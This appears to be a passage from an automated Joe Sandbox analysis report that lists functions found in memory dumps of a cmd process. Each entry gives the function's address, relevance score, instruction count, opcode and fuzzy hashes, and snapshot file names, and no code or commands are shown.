Opcode ID: 2afb35a1027e4f0e8cd4cc7d1a520fa06ccf59b1e39a8d42736b6f12101f1c62
Instruction ID: 3443073e7c939798902879e83d0bb69073ab91fb155cdc8f995076579ae76512
Opcode Fuzzy Hash: 2afb35a1027e4f0e8cd4cc7d1a520fa06ccf59b1e39a8d42736b6f12101f1c62
Instruction Fuzzy Hash: 84411830E0995D8FEB64DF9888A47E8B7B1FF58304F1151BAD01DA22D5CB746A85CB01

Function 00007FFD9BB25E7F Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1cdc26a16ec45ad0edf1273900eeb3f675c9c2ba48d8ae84c927e9c4fef24d
Instruction ID: 2ce9e26e716c3dc767ef6f11cc86db80dda02d5f769423e7487e1c4f9c77e105
Opcode Fuzzy Hash: 9b1cdc26a16ec45ad0edf1273900eeb3f675c9c2ba48d8ae84c927e9c4fef24d
Instruction Fuzzy Hash: 1F412471E19A5D8FDFA8DF58C895BA8B7F1FB68310F0541AAD01DE32D1DA346980CB01

Function 00007FFD9BAD0998 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f796e6102c3a03058073d3ca8cb4f47f2fb1549bdfd42c4a0af49c4aa64dea1
Instruction ID: 55fa9b6e938a86c93c6f912542d10fad51020ef7e0bdacea845a9621b9cca5fe
Opcode Fuzzy Hash: 1f796e6102c3a03058073d3ca8cb4f47f2fb1549bdfd42c4a0af49c4aa64dea1
Instruction Fuzzy Hash: 23411970A1891D8FDB94EF98C8A5AEDB7F1FF58315F01016AE409E32A5DB34A951CB80

Function 00007FFD9BAD50F4 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc4d8babee7453d474e9fce8a36d0ff2bdea8ec9663993dc7ac4fa392df41885
Instruction ID: 0d07ef85c0643f3a3a5d2969b45f87bfd0c0073ea00b785c84c710fb88ab188f
Opcode Fuzzy Hash: dc4d8babee7453d474e9fce8a36d0ff2bdea8ec9663993dc7ac4fa392df41885
Instruction Fuzzy Hash: 2431A87491891C8FDFA8EB14C865AE9B7B0FB68305F1001EA900EE3295CB755B80CF41

Function 00007FFD9BAE79A9 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bae5000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54e4821042c4a6c07f63f8c16325f3a8f6b1bb1dd0c075955b7c84f94c5568e
Instruction ID: df73c03d87cea8411adfb096b576f620ecfb3d988df9104c9410aeb96bd0b9bb
Opcode Fuzzy Hash: c54e4821042c4a6c07f63f8c16325f3a8f6b1bb1dd0c075955b7c84f94c5568e
Instruction Fuzzy Hash: 1C316D70A0968D8FDB55DF58C865AEE7BB1FF58304F06066AE849E3291CB74AD40CB81

Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7fe619a6a2d70a4eb0647356edbb151d97b861f054bf4098ee4aff94ab5b87
Instruction ID: 126f954ff7c9917621ab037d130cde3871d79eb6cfd189bef6a35e5a044393b6
Opcode Fuzzy Hash: 4a7fe619a6a2d70a4eb0647356edbb151d97b861f054bf4098ee4aff94ab5b87
Instruction Fuzzy Hash: 85213736B0E28D4FE7229BA8DC312ED7760EFC2721F464673C054971E2D678260AC795

Function 00007FFD9BAEF4F0 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42542fe8dab1d79c4f15c8ec002216d0b40d85a9d6e6fc271a13a0f104d72f97
Instruction ID: 9d50622bdb0932431b640b5d3c0d551611b9e2fec7681cc2dedebdd690cff0fa
Opcode Fuzzy Hash: 42542fe8dab1d79c4f15c8ec002216d0b40d85a9d6e6fc271a13a0f104d72f97
Instruction Fuzzy Hash: 76217F3090964D8FDB55EFA4C858AEEBBF1FF29300F0045AAD819D72A1DB74A654CB81

Function 00007FFD9BB21B65 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 534cf7c85680f606d78b79aaddd476a16645aa5add17d3959ae33bdbc3203d04
Instruction ID: 9a70e02111b287d195ab6c4126bb27412c8b6b9bbdda2dc59481e817582796a1
Opcode Fuzzy Hash: 534cf7c85680f606d78b79aaddd476a16645aa5add17d3959ae33bdbc3203d04
Instruction Fuzzy Hash: 0F212A31A0A55D8FEBA4EF58C865BB8B7A1FF68304F1141B6D41DD31E1CE346E818B05

Function 00007FFD9BAD119D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8093d72919c6aa43565768f43b48e0bf24b358a1e2194a38cf8e9672c3f4aef
Instruction ID: 44d9b4fab3716e47387ed32aacfbff7b8952691a174aed54830be135f7c4cdea
Opcode Fuzzy Hash: c8093d72919c6aa43565768f43b48e0bf24b358a1e2194a38cf8e9672c3f4aef
Instruction Fuzzy Hash: CD210E31A1491E8FEB94EBA8C8949AD77F1FF68300B11467AE41DD72A1DF74A941CB40

Function 00007FFD9BB0D790 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB04000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb04000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f7265e7da688a46e1cfd0efc6b9d2be5e394696a9d7ed9d4f46e7656ff12a1
Instruction ID: 984ea8faa0967fefde00bee8a490c733129aa10d6de291bb1ea81ba4166b69a7
Opcode Fuzzy Hash: c5f7265e7da688a46e1cfd0efc6b9d2be5e394696a9d7ed9d4f46e7656ff12a1
Instruction Fuzzy Hash: 8A21B271E19A4E4FEB54EB98C855ABD77E1FF18354F04027AE458D32DADA382540CB41

Function 00007FFD9BAD90A2 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d3cbb68b616acbba781cd1cfb374d371dc6d34f43ab149395b09a5892f768a
Instruction ID: bdbd7ae3c0e9b347a922a3d12957731a27f8186d0aeca98556c9f730a9cd05b2
Opcode Fuzzy Hash: 88d3cbb68b616acbba781cd1cfb374d371dc6d34f43ab149395b09a5892f768a
Instruction Fuzzy Hash: AF21A970A1956D8EEB64EB54C8647ECB6B1EF94345F0542FA900DE62A1DB745B81CF00

Function 00007FFD9BAD9014 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519d0b8c653c9cf4c68ebf1e2811e4d7cfef65f9f826a2c1f7430f8a418ea4ec
Instruction ID: be87fd6c904128c6aa2544e8b27a9d90ec6ae1196e720cdc4f6ada2071a1cf92
Opcode Fuzzy Hash: 519d0b8c653c9cf4c68ebf1e2811e4d7cfef65f9f826a2c1f7430f8a418ea4ec
Instruction Fuzzy Hash: 4821AA70D1956D8EEBA4EB54C8A4BEDB6B1EB58315F1046FAC00DA2291DFB46BC4CF04

Function 00007FFD9BAD0C38 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a721b2449a753f99a71c75c82cbddb002971f8748882129ce6e5e4e53706d468
Instruction ID: 45c5d39da149e01b327cf4477147f1440b6ea104e2e2c22effc088dde53aa5a9
Opcode Fuzzy Hash: a721b2449a753f99a71c75c82cbddb002971f8748882129ce6e5e4e53706d468
Instruction Fuzzy Hash: DB11E632B0E68D4EE7229BA8C8712E97770EF82711F454673D0549B1E2DA782606C795

Function 00007FFD9BAD8E94 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647f8d62088259e5bf7a649de46c5bad6b6b6530dc2fd2215ba9de87b9124001
Instruction ID: 8fb29febc9cab6cc7824627cc0108cdb425608b19d92e4ea6593cc6198a1f399
Opcode Fuzzy Hash: 647f8d62088259e5bf7a649de46c5bad6b6b6530dc2fd2215ba9de87b9124001
Instruction Fuzzy Hash: 8F212F31E1E55D8EEBB4DB54C8646FC72B1AB94755F1142BAC00DA22A1DFB86B84CF00

Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 547627d62c14ed8bd6b41b75e82de44a35a2a252b7be96b27a5e5f45243a5a5d
Instruction ID: 2ae30314883d42f09278e294cc8917319d93ed3d4c8b9afca4590f33b9211e8d
Opcode Fuzzy Hash: 547627d62c14ed8bd6b41b75e82de44a35a2a252b7be96b27a5e5f45243a5a5d
Instruction Fuzzy Hash: 14110632A0E68D4FE7229BA4C8702EE7770EF82711F054673D055DB1E2CA782609CB55

Function 00007FFD9BB26031 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c8dedfd48a83ebb9ca85d6fc0cfd5bc2352923f9a22e954f4ce57c350ca1214
Instruction ID: c7f9a78cefd68dabc67985d3dd935fa68ef39e6d53055722b44ce4a6e88c19ce
Opcode Fuzzy Hash: 1c8dedfd48a83ebb9ca85d6fc0cfd5bc2352923f9a22e954f4ce57c350ca1214
Instruction Fuzzy Hash: 4C116370E0951D8EEBA8DB5888957A9B7F1FF68304F1582B6C01DE31D1DA346A859F01

Function 00007FFD9BAE739D Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bae5000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b505ee4fa8b701e60cd429904e8ca4ecd5c4f09d29b6ff5dfd04f7ceabeb5b
Instruction ID: 6d990896ceeaa2b9ecaa895ef5374804e9ff90c2fd765ea7af96b9290ca3e1a3
Opcode Fuzzy Hash: 60b505ee4fa8b701e60cd429904e8ca4ecd5c4f09d29b6ff5dfd04f7ceabeb5b
Instruction Fuzzy Hash: 2B014531E0D50E8BE7509B64D4642FDBBA1EF85314F424072D508D22D5DA78690A8780

Function 00007FFD9BAF0508 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3120abb187665d6f9d3cf9795dee914540f7a3e90523487285b8bfc948726fb0
Instruction ID: f5462785623b62419fe4e395b24b905191f2f09b15aaabddbd6fc454b6732311
Opcode Fuzzy Hash: 3120abb187665d6f9d3cf9795dee914540f7a3e90523487285b8bfc948726fb0
Instruction Fuzzy Hash: 6D21B870F0A22D8EEBB0DF9498547ED77B0BF04711F5145B6C40DD72A1DAB99A849F04

Function 00007FFD9BB19F59 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0161b90b117c2dd268e33fa05718dc46ff8bfcca4cc028a87806a10a9d1400
Instruction ID: 63a8afbb04f2e0b72312d48769f01b3997572b086801e39c9c425e2dc0f8cd90
Opcode Fuzzy Hash: 8f0161b90b117c2dd268e33fa05718dc46ff8bfcca4cc028a87806a10a9d1400
Instruction Fuzzy Hash: FF11527090868D8FDF45EF58C8999ED7BF0FF29304F01019AE458D71A1D734A555CB81

Function 00007FFD9BAED6F9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce8537245f69b9b00bd964c7ad67a298875ef855abd99d2cb6e4659c2b092793
Instruction ID: a50d21945512c0edc94e88c1616d5270efc0d9999282f4bf23818acb46dbfb24
Opcode Fuzzy Hash: ce8537245f69b9b00bd964c7ad67a298875ef855abd99d2cb6e4659c2b092793
Instruction Fuzzy Hash: 3D01927250E7C96FD7238B2098615807F70AE77244B0905DBC4C49F0A3E629DB56C752

Function 00007FFD9BAE7B41 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bae5000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 745d342c5cf69fe6779fe4b2efe08c35ba89d262bbb70d4a37dff10a087e23ee
Instruction ID: d738aa47f6c8142c775113d35a483404547f40c53b20c85eb2698c824a1ca37f
Opcode Fuzzy Hash: 745d342c5cf69fe6779fe4b2efe08c35ba89d262bbb70d4a37dff10a087e23ee
Instruction Fuzzy Hash: 8C012470A2868CCFCB85EF18C895AD97BF0FF59304F0602AAE849C7265D774E950CB81

Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f5bfcbb19a4b42c190a079bd8ddfeee3ed9bc2292948fb0e7ae46223703aeb7
Instruction ID: ca6712a862a930a8915dc20d6a2206266112c39c378ef30e03cd9574b312388d
Opcode Fuzzy Hash: 4f5bfcbb19a4b42c190a079bd8ddfeee3ed9bc2292948fb0e7ae46223703aeb7
Instruction Fuzzy Hash: F101D271A0E28E8FE7229BA4C8602EE7B70EF82711F0542B3D455DB1E2CA782604C745

Function 00007FFD9BADB3A2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5537c81e21c29ab5100b3fd733abac75941d878031bc1a667f5f864665178be3
Instruction ID: 9788813388e37e527e8c1543263a982e2afdcc0e3fd75ab2cd50913a2a0fbf2c
Opcode Fuzzy Hash: 5537c81e21c29ab5100b3fd733abac75941d878031bc1a667f5f864665178be3
Instruction Fuzzy Hash: 1D21EA70E0666D8EEB70EB54C8547EDB3B1EBD5311F1042E9C00DA2291DBB95AD5CF05

Function 00007FFD9BAD8ED2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d3908c6a8591edd985ba8eb1238f4e1f4ac7b3b4cd93431749f504880a843be
Instruction ID: bce1c344575b0f15800930814374db21548ea36b206fa403a184fff431c99aef
Opcode Fuzzy Hash: 2d3908c6a8591edd985ba8eb1238f4e1f4ac7b3b4cd93431749f504880a843be
Instruction Fuzzy Hash: 2911ED30D1956D8EEB74DB54C8647ECB6B1AB94705F4142FAD00DA62A1DFB86BC4CF00

Function 00007FFD9BB0E3D9 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB04000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb04000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf33dcf6f05b66f8dae620098866e0fe1079892ee0e5fdc5af7491a37b88424
Instruction ID: 3a277d8533571a07c8826c341cacd479eb7501d7b6dbb9f282431bcb9f79a681
Opcode Fuzzy Hash: 4bf33dcf6f05b66f8dae620098866e0fe1079892ee0e5fdc5af7491a37b88424
Instruction Fuzzy Hash: 66011B70909A8D8FDF85EF58C858AAE7FF0FF25304F0505AAD458C72A1DB349554CB80

Function 00007FFD9BB11DC1 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB04000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb04000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4ac403fe63df0e617cb71de59ba425bfa8d003656175992ee758dfca5489836
Instruction ID: 9a5212b537f43eb44fcf1057c7694645043dcc6680b03f775fe5c38dc52ba07c
Opcode Fuzzy Hash: c4ac403fe63df0e617cb71de59ba425bfa8d003656175992ee758dfca5489836
Instruction Fuzzy Hash: F801AD3190968C8FDF81EF28C859AE93FF0FF18304F0102AAE808C31A1D734A590CB81

Function 00007FFD9BB2502C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc8b7a969078309afb77994391991af3cdc4f419b2316499dbb4497f39c179d
Instruction ID: ace140ec7bbf5b5ca25f70a8f5edbda6375e3e51782706f1ea0d577b09a1afbb
Opcode Fuzzy Hash: 7dc8b7a969078309afb77994391991af3cdc4f419b2316499dbb4497f39c179d
Instruction Fuzzy Hash: D001CC70918A4D9FDF94EF58C859AEA7BF0FF68305F00056AE419D3260DB71A554CB80

Function 00007FFD9BB223B9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78a09cd5a790963fcdbcc5b18683bb1cb5f6d2246d7a48e92c139c8192cad723
Instruction ID: 30f5ebfde6080f4cedc07e81f94df80c9ee010a8eb13086f4eac6cd65d1b1997
Opcode Fuzzy Hash: 78a09cd5a790963fcdbcc5b18683bb1cb5f6d2246d7a48e92c139c8192cad723
Instruction Fuzzy Hash: 5E015E3090968D8FCF85DF68C854AAE7BF0FF25300F0505ABD458C72A1DB749954CB80

Function 00007FFD9BB24F4C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252da2ef6c080f33c9f76b31aabb142bec50d42b3df346eea292114bbeddd9ce
Instruction ID: df771370f56d8e504ffcb1512afe866bc1166807f102d52974e80c563e613109
Opcode Fuzzy Hash: 252da2ef6c080f33c9f76b31aabb142bec50d42b3df346eea292114bbeddd9ce
Instruction Fuzzy Hash: 0701E930908A4D8FDF84EF58C858AED7BF0FB68305F00056AA41DD3264DB30E550CB80

Function 00007FFD9BB1BA49 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c5f97c7a25b0cfec261c6ce8e1c7b07bebbbe59c043c9ac4487745d72e4759
Instruction ID: 98b7189cb82a126f85a69ec2c6cf5f14bf7ca2243d071d29dac72c2426a3f256
Opcode Fuzzy Hash: 43c5f97c7a25b0cfec261c6ce8e1c7b07bebbbe59c043c9ac4487745d72e4759
Instruction Fuzzy Hash: FA018C30909A8C8FCB95EF18C869A997FF0FF29304F0501AAD408C71A2CB349954CB81

Function 00007FFD9BB25030 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f28dd5bbfddedd8421376f7c3c545c9abea5c9fa6bbdc6a292cfeae6ff72fd
Instruction ID: 56066f3fcf0075c13072c5539dd8d9d04434ee38bc48f8c4ee8b3a4439095ed7
Opcode Fuzzy Hash: 13f28dd5bbfddedd8421376f7c3c545c9abea5c9fa6bbdc6a292cfeae6ff72fd
Instruction Fuzzy Hash: 6B01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3260DB71E594CB81

Function 00007FFD9BB24F50 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58dffa8a131593de34b6f145a8c3c74f057038de3fdd102c6972b22dc26fb045
Instruction ID: 75311bd299ea2eda295f854f8030c546785a2af2e42523a5c3472e93a990abd3
Opcode Fuzzy Hash: 58dffa8a131593de34b6f145a8c3c74f057038de3fdd102c6972b22dc26fb045
Instruction Fuzzy Hash: 2B01E830914A4D8FDF84EF68C848AEE7BF0FB68305F00056AA81DD3264DB30E590CB80

Function 00007FFD9BB0E471 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB04000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb04000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6357add46be7c7d992f8a693d5c834918e9af2e4109049b7897570b71f6229b0
Instruction ID: 5c8c5fac69d4e7523c0eb83b6c0fcd980475e301cd55efefe0466c68e9555323
Opcode Fuzzy Hash: 6357add46be7c7d992f8a693d5c834918e9af2e4109049b7897570b71f6229b0
Instruction Fuzzy Hash: 9A01FB7090890E8FDF84EF98C895ABD7BE0FF68304F14446AE46DD32A5DB759690CB81

Function 00007FFD9BAE8035 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bae5000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44ac6880e9874026041d596654d4698a2b0e55c2bb659e7a106981bec5606602
Instruction ID: b7e2acc53ed0ee4483826e57b1d99908854dc8b4fa049efe2c4b3ec5d2f98df5
Opcode Fuzzy Hash: 44ac6880e9874026041d596654d4698a2b0e55c2bb659e7a106981bec5606602
Instruction Fuzzy Hash: 6C01AD3091878D8FDB54EF18C8566E93BF0FF58355F4502AAE84887292C738E654CB82

Function 00007FFD9BAEFB68 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee7668c7a5d165eece939dc47c7739424071c1ac6bbb7418cf73fc4b7936e456
Instruction ID: a895434d15950fc28f4ad90c7dac97ee779191decaccbbe41acb77b2e2fdef56
Opcode Fuzzy Hash: ee7668c7a5d165eece939dc47c7739424071c1ac6bbb7418cf73fc4b7936e456
Instruction Fuzzy Hash: 5D01AD30A0951E8BEB68EF44C820ABE76B0FF44314F814279D099962A4CFB86A858B40

Function 00007FFD9BB1A039 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18a490b4dd6003e618c64967db993248fa9988e0b7ccae66984bca3337bf8873
Instruction ID: fd0315f98d96cb17245a9069f12be38099defda421899e23be26aa2d8bc3d872
